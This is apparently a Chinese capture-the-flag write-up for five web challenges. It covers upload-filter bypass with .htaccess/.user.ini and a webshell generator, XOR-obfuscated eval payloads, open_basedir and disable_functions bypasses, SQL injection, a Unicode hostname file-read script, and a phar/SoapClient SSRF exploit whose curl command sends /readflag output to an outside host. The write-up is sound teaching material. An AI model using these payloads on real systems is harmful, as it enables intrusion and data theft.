1.web1-chkin
首先发现服务器中间件为nginx,并且fuzz上传过滤情况,是黑名单,带ph的全部不能上传切对文件内容中包含<?进行过滤,并且服务器对文件头有exif_type的判断,直接通过xbm格式绕过,传.htaccess和.user.ini是可以的,又因为此题为nginx,所以通过.user.ini结合文件夹中已经有的index.php使其包含上传的shell.png来getshell即可
2.web2-easyphp
做的时候思路也很明确,通过eval来调用get_the_flag函数,只需要异或出一个_GET即可,这里傻了刚开始一直以为异或得到字符串必须在url中通过'单引号或者双引号来包含着这些可以用的字符,因为这些字符有特殊含义,所以浏览器解码以后不能直接用,因为我fuzz异或字符时是以可打印字符为payload的,实际上这里要用到不可打印字符,这样浏览器即使解码也不会把其识别成有特殊含义的字符
上面是异或出来的可见字符,当然这些字符大多数有特殊含义,在浏览器端不能直接使用,要用的话也要让单引号包含着,当作字符串,但是这里是没有单引号或者双引号的
所有可打印字符的ascii码值为,只要是在这个范围内的字符,全部都会被浏览器解码为可见字符,因此可以在这个字符范围内进行异或字符的fuzz
['61', '62', '63', '64', '65', '66', '67', '68', '69', '6a', '6b', '6c', '6d', '6e', '6f', '70', '71', '72', '73', '74', '75',
'76', '77', '78', '79', '7a', '41', '42', '43', '44', '45', '46', '47', '48', '49', '4a', '4b', '4c', '4d', '4e', '4f', '50',
'51', '52', '53', '54', '55', '56', '57', '58', '59', '5a']
上图是fuzz出来的可以用的payload,可以看到可以用的payload,非常多,就拿第一个试试吧成功执行了phpinfo
payload为:
${%80%80%80%80^%df%c7%c5%d4}{%80}();&%80=phpinfo
fuzz异或的脚本如下所示:
import string ee= string.printable a= map(lambda x:x.encode("hex"),list(ee)) _=[] G=[] E=[] T=[] print list(ee) for i in range(256): for j in range(256): if (chr(i) not in list(ee)) & (chr(j) not in list(ee)): tem = i^j if chr(tem)=="_": temp=[] temp.append(str(hex(i)[2:])+"^"+str(hex(j))[2:]) _.append(temp) if chr(tem)=="G": temp=[] temp.append(str(hex(i)[2:]) + "^" + str(hex(j))[2:]) G.append(temp) if chr(tem)=="E": temp=[] temp.append(str(hex(i)[2:]) + "^" + str(hex(j))[2:]) E.append(temp) if chr(tem)=="T": temp=[] temp.append(str(hex(i)[2:]) + "^" + str(hex(j))[2:]) T.append(temp) print _ print G print E print T
这里就可以执行get_the_flag函数了,就进入第二层
第二层是
function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir); } if(!empty($_FILES["file"])){ $tmp_name = $_FILES["file"]["tmp_name"]; $name = $_FILES["file"]["name"]; $extension = substr($name, strrpos($name,".")+1); if(preg_match("/ph/i",$extension)) die("^_^"); if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^"); if(!exif_imagetype($tmp_name)) die("^_^"); $path= $userdir."/".$name; @move_uploaded_file($tmp_name, $path); print_r($path); } }
第二层和第一个题基本相似,ph全过滤,
但是可以上传.htaccess,因此可以使用
#!/usr/bin/python3 # Description : create and bypass file upload filter with .htaccess # Author : Thibaud Robin # Will prove the file is a legit xbitmap file and the size is 1337x1337 #SIZE_HEADER = b" #define width 1337 #define height 1337 " def generate_php_file(filename, script): phpfile = open(filename, 'wb') phpfile.write(SIZE_HEADER) phpfile.write(script.encode('utf-16be')) phpfile.close() def generate_htacess(): htaccess = open('.htaccess', 'wb') htaccess.write(SIZE_HEADER) htaccess.write(b'AddType application/x-httpd-php .ppp ') htaccess.write(b'php_value zend.multibyte 1 ') htaccess.write(b'php_value zend.detect_unicode 1 ') htaccess.write(b'php_value display_errors 1 ') htaccess.close() generate_htacess() generate_php_file("webshell.ppp", "<?php eval($_GET['cmd']); die(); ?>")
拿到shell以后,这道题还有三种做法:
1.openbase_dir的限制,因此还要先绕过openbase_dir,
这里因为出题人disable_function的过滤不严,也可以通过
chdir('xxx');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/'));
来进行bypass列目录,然后再跳一次进行读取flag即可
2.直接通过绕过disable_dunction来进行绕过openbase_dir,这里出题人没过率好
3.预期解是通过攻击php-fpm的unix套接字来进行绕过openbase_dir和绕过disable_function,因为php-fpm通常就两种运行模式,fast-cgi和unix套接字模式运行,所以这里可以直接用p神的脚本,更改一下php_value的值即可
需要将这个默认文件改为unix套接字的路径
php7.2-fpm.sock默认在,unix:///run/php/php7.2-fpm.sock
但是0ctf中也出现过在其他目录,如/var/run/php/下,
'PHP_VALUE': 'auto_prepend_file = php://input'+chr(0x0A)+'open_basedir = /',
3.easy_sql
这道题拿上我就直接尝试的是短路型注入方式,length(database())={},根据返回1或者0来判断逻辑,但是后面就遇到问题了,可以跑出来库名为CTF,要跑表
但是限制了payload长度,因此没法继续注入去拿表名,并且from也是过滤了,还想过是不是可以直接猜测字段名通过substr(flag,1,1)这种来拿到flag,但是flag关键词也被过滤了,猜测了几个其它的字段也没用
这里也尝试过load_file,load_file('/flag')来尝试,但是也没反应,后面堆叠是可以查表查字段的,但是flag过滤了,prepare限制了sql语句的长度,也凉凉
这里把Flag字符串直接进行过滤了,强网杯也出过这种题,尝试预编译:
payload还没输完就报长度限制了,因此这种方法也不行
这里有队伍扫出源码了,.index.php.swp,我用dirsearch没扫到,得换个工具再扫一次。。
过滤关键词在这里
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|fr om|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|"";
查询语句如上图所示,可以看到是支持堆叠查询的,感觉预期解应该是堆叠注入,然而并不是,是一个新的知识点
预期解为:
1;set sql_mode=pipes_as_concat;select 1
即将||或逻辑转为字符串连接,那么将会把任意传递的query内容和flag进行拼接返回
这题没有过滤*,导致非预期很严重,*,1直接可以出flag。,如果过滤好的话,这道题估计还是得猜逻辑
和字符串或时前面为1则返回1,前面为0则返回0,变为pipes_as_concat以后||就成了连接符了,还是一个比较新的点。
4.pytohnginx
看到题目第一眼立马想到blackhat2019刚出来的这个unicode编码的洞
这里之前不了解python的urllib.request.urlopen的截断,这里不存在的目录的话会直接截断导致没法读取文件,我刚开始选择是
那么转化以后c/o,o这个文件夹肯定是不存在的,因此没法读取,urlopen打开文件夹进行目录穿越时必须是存在的目录
比如上面这个app目录是存在的,题目的nginx配置文件如下图所示
这里有以下几种解法:
1.直接通过转换一个像c的字符,来进行读文件,delta的exp就是利用unicode字符范围来尝试出可以使用的字符串
from urllib.parse import urlparse,urlunsplit,urlsplit from urllib import parse def get_unicode(): for x in range(65536): uni=chr(x) url="http://suctf.c{}".format(uni) try: if getUrl(url): print("str: "+uni+' unicode: \u'+str(hex(x))[2:]) except: pass def getUrl(url): url = url host = parse.urlparse(url).hostname if host == 'suctf.cc': return False parts = list(urlsplit(url)) host = parts[1] if host == 'suctf.cc': return False newhost = [] for h in host.split('.'): newhost.append(h.encode('idna').decode('utf-8')) parts[1] = '.'.join(newhost) finalUrl = urlunsplit(parts).split(' ')[0] host = parse.urlparse(finalUrl).hostname if host == 'suctf.cc': return True else: return False if __name__=="__main__": get_unicode()
随便选其中一个就可以,然后访问:
可以看到此时达成的效果是相同的
2.第二种就是多转为一个/,利用file://suctf.cc/usr/local/nginx/conf/nginx.conf先读nginx的配置文件,然后可以看到flag的位置在/usr/fffffflag,然后再读flag即可,这里不要移位nginx的配置文
件只是为/etc/nginx/nginx.conf,刚开始我不知道urlopen不存在的目录会截断==
3.利用file:////suctf.cc/etc/passwd来绕过,那么urlparse解析的时候将无法取到hostname
然后第二步将url分割,分割出来还是空,因此前两个if判断很容易bypass
经过第三步,此时finalurl和host都是满足条件的,主要是还是因为前面urlspilt时去掉了中间的两个//
然后进行任意文件读取即可,这个也是非预期,感觉比较有意思
5.uoload labs
这道题开了一会给源码了
其中index.php,限定了后缀,并且返回上传路径,对上传文件内容检测<?
func.php中,会对我们提交的文件地址进行访问
并调用getMIME函数进行文件内容检测,这里实际上猜也能猜到肯定这里存在phar反序列化,因为后面的admin.php限定了访问的ip地址
因此这里自然想到考了很多次的SoapClient反序列化,那么恰好这个File类又存在__wakeup函数
因此在反序列化时将会通过反射类机制实现类的实例化,并且调用类对象的check的函数,这里我们可以通过$this->func=“SoapClient”,$this->file_name为new SoapClient(null,payload)中的payload传入即可,并且调用不存在的check函数,从而发起soap请求,那么现在外层的思路已经清晰了,通过phar反序列化触发soap请求,那么这里读取文件的时候又进行了限制:
这里过滤了很多协议,phar://,conpress.bzip2,conpress.zlib都过滤了
因此可以用:
php://filter/resource=phar://
来绕过过滤,从而来触发phar反序列化,那么序列化链条已经好了,现在要构造内部数据,先贴一个exp(针对buu平台复现的,有所修改):
<?php system('rm -f 222.phar;rm -f *.gif'); $phar = new Phar('333.phar'); $phar->startBuffering(); $phar->addFromString('333.txt','text'); $phar->setStub('<script language="php">__HALT_COMPILER();</script>'); class File { public $file_name = ""; public $func = "SoapClient"; function __construct(){ $target = "http://127.0.0.1/admin.php"; $post_string = 'admin=1&cmd=curl --referer "`/readflag`" "http://xss.buuoj.cn/index.php?do=api%26id=qS1LKY"&clazz=SplStack&func1=push&func2=push&func3=push&arg1=123456&arg2=123456&arg3='. " "; $headers = []; $this->file_name = [ null, array('location' => $target, 'user_agent'=> str_replace('^^', " ", 'xxxxx^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'Content-Length: '. (string)strlen($post_string).'^^^^'.$post_string), 'uri'=>'hello') ]; } } $object = new File; echo urlencode(serialize($object)); $phar->setMetadata($object); $phar->stopBuffering(); system('mv 222.phar 222.gif');
首先soap的内部数据,主要是访问admin.php时需要post过去的数据
这里调用将传递到admin.php的参数进行实例化了AD类,在这个类中,又通过反射类来实例一个对象,并通过该实例化的对象来调用反射出来的该类的方法,因此只要满足传递过去的clazz类存在并且传给该类的函数的参数可以为一个就行,这里可以直接用splstack类,就是php语言实现的一个栈数据类型的类,我们只需要随便调用其中一个方法即可,比如push方法,将数据压入栈中。
clazz=SplStack&func1=push&func2=push&func3=push&arg1=123456&arg2=123456&arg3=
即这一个部分就可以构造好了,在用buuoj的平台测试的时候要注意cmd参数要适当转义
curl --referer "`/readflag`" "http://xss.buuoj.cn/index.php?do=api%26id=qS1LKY"
这里一个部分要将&换为%26,防止命令行下将&识别为命令链接符号,比如ls & id,将执行两条命令,这里还要注意题目中对要读取的文件内容进行了一个过滤<?,那么在phar的stub中,也就是标志phar包的标志中:
$phar->setStub("GIF89aphp __HALT_COMPILER(); ?>"); //设置stub
所以只需要保证后面的一部分结尾正确即可。
或者可以使用前面题目中的<script language="php">来绕过
接下来直接生成exp进行测试即可,又可以收到flag了
然而这个不是预期解,预期解是:
$m = new mysqli();
$m->init();
$m->real_connect('ip','数据库账号','数据库密码','数据库',3306);
$m->query('select 1;')//执行的sql语句
实际上是与下图的check函数是对应起来的
这样结合在vps搭建一个rouge mysql服务器就能够对客户端文件进行读取了,那么没设计好的是__destruct函数,这个析构函数在程序执行结束后也会执行一次,zedd师傅在后面也改成了__wakeup函数
正常情况下不执行__wakeup()
只有反序列化的时候会执行__wakeup(),然后执行__destruct(),然后程序运行结束销毁对象,在执行一次__destruct函数
关于mysql 客户端攻击链接: